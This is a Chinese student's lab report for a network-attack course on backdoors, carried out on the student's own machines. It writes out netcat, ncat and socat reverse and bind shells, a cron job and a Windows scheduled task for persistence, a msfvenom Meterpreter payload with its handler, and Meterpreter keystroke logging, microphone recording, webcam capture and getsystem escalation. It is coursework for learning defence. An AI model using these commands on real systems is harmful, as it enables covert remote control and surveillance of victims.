2019-2020-2 20175203马羽达《网络对抗技术》Exp2 后门原理与实践

2019-2020-2 20175203马羽达《网络对抗技术》Exp2 后门原理与实践

任务

1.实验内容

1.1使用netcat获取主机操作Shell，cron启动
1.2使用socat获取主机操作Shell, 任务计划启动
1.3使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
1.4使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权
1.5使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell

2.问题回答

2.1例举你能想到的一个后门进入到你系统中的可能方式？
2.2例举你知道的后门如何启动起来(win及linux)的方式？
2.3Meterpreter有哪些给你映像深刻的功能？
2.4如何发现自己有系统有没有被安装后门？

3.实验总结与体会

Win获得Linux Shell

先下载ncat到主机，将其解压到C:\Users\马羽达\ncat,在主机的cmd输入ipconfig查找主机ip：192.168.203.1

在cmd进入ncat所在的文件夹，输入命令ncat.exe -l -p 5203(5203是我的学号端口）并运行

在linux终端中输入nc 192.168.203.1 5203 -e /bin/sh：

此时Win已经获得Linux Shell，如图所示：

Linux获得Win Shell

在linux终端中输入ip add查看ip：192.168.113.131

输入nc -l -p 5203使其处于监听状态
在主机的cmd还是打开之前的ncat文件夹，输入ncat.exe -e cmd.exe ip_of_linux 5203
再看linux已经出现了win的命令提示：

使用nc传输数据

win监听，linux连接即可，如下：

1.1使用netcat获取主机操作Shell，cron启动

开始还是一样的操作，在主机打开cmd，输入ncat.exe -l 5203监听,在Linux终端输入crontab -e编辑定时任务，选择编辑器3(因为是新创建），在底行插入50 * * * * /bin/netcat 192.168.203.1 5203 -e /bin/sh，即在每个小时的50分时反向连接主机的5203端口。等到50的时候我们可以看到：

1.2使用socat获取主机操作Shell, 任务计划启动
在主机下载socat，还是解压到之前ncat一样的父目录C:\Users\马羽达下，右键我的计算机选择计算机管理在左边目录中点击任务计划程序并点击右边的创建任务：

在常规选项中填写任务名称mydsocat，在触发器选项中新建触发器

在操作选项中新建操作，选到解压的socate的路径，在参数中填入tcp-listen:5203 exec:cmd.exe,pty,stderr，将cmd.exe绑定到端口上
win+L锁定主机重登录后点击任务计划程序库，可以发现创建的任务socat成功

在Linux中输入socat - tcp:192.168.203.1:5203成功获得cmd Shell:

1.3使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

在组长的博客中我们学习到要先更新bundler，更新之后在终端中输入
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.113.131 LPORT=5203 -f exe > myd_201752203_backdoor.exe ![](https://img2020.cnblogs.com/blog/1591742/202003/1591742-20200314112940081-526379866.png) 在cmd的ncat文件夹中运行ncat.exe -lv 5203 > myd_20175203_backdoor.exe得到当前连接状态 ![](https://img2020.cnblogs.com/blog/1591742/202003/1591742-20200314113110719-410491886.png) linux中输入nc 192.168.203.1 5203 < myd_20175203_backdoor.exe将后门程序传送到主机，在cmd中可见： ![](https://img2020.cnblogs.com/blog/1591742/202003/1591742-20200314113402983-1532975706.png) 并进入文件夹查看： ![](https://img2020.cnblogs.com/blog/1591742/202003/1591742-20200314113441879-1915274006.png) 在Linux中打开一个新终端，输入msfconsole进入msf控制台，输入： use exploit/multi/handler 使用监听模块，设置payload、set payload windows/meterpreter/reverse_tcp使用payload、set LHOST 192.168.113.131、set LPORT 5203、exploit开始监听。 ![](https://img2020.cnblogs.com/blog/1591742/202003/1591742-20200314113944784-2029776049.png) 退出主机cmd并重新进入，双击运行后门程序myd_20175203_backdoor.exe,在linux中可见主机的shell（见上图） 1.4使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权 输入record_mic截获音频 ![](https://img2020.cnblogs.com/blog/1591742/202003/1591742-20200314114334406-1405451851.png) 输入screenshot截屏 ![](https://img2020.cnblogs.com/blog/1591742/202003/1591742-20200314114407797-902709025.png) 输入webcam_snap使用摄像头拍照(第一次不成功，在主机中对摄像头进行一次初始化设置即可） ![](https://img2020.cnblogs.com/blog/1591742/202003/1591742-20200314114531523-1585210213.png) 输入keyscan_start开始记录击键，输入keyscan_dump读取记录 ![](https://img2020.cnblogs.com/blog/1591742/202003/1591742-20200314114616999-390398719.png) ![](https://img2020.cnblogs.com/blog/1591742/202003/1591742-20200314114637936-366207797.png) 使用getuid查看当前用户，使用getsystem`进行提权

2.1例举你能想到的一个后门进入到你系统中的可能方式？

之前遇到过，就是在电影天堂下载游戏的时候，360一直跳恶意提示，我以为是和安装其他软件的时候一样，就没有在意，之后qq号就被盗了。。。一直在发什么棋牌啥的，，，所以下载不安全的盗版软件就是会出现这些问题（一定要好好看防火墙的警告提示！！！）

2.2例举你知道的后门如何启动起来(win及linux)的方式？

在实验中，windows可以通过cron定时启动，linux可以反弹端口启动，在之前学到的木马插件实验中是通过在你的电脑放服务端，进行对你电脑的控制。

2.3Meterpreter有哪些给你映像深刻的功能？

我觉得还是这个记录敲击键比较可怕，我现在还非常怀疑之前的qq号就是这么被盗窃的，因为腾讯的服务端应该很健全了，所以还是出现在自己的主机的问题上，这样也不难发现用一次一密形式的手机验证码更加保险。
2.4如何发现自己有系统有没有被安装后门？
一个是通过杀毒软件进行软件后门、插件检测，还有就是通过防火墙进行检测。

3.实验总结与体会

本次实验总体来说没有出现什么问题，一切进行的都很顺利，但是让我们很深刻的意识到了网络攻击的多样手段，在现实生活中，还是要注意自己的电脑安全，定期进行杀毒，时刻打开防火墙，注意及时更新电脑的补丁包（之前李冬冬老师也提到过针对win的漏洞进行攻击电脑的情况）不要认为自己的电脑没有什么秘密而大意。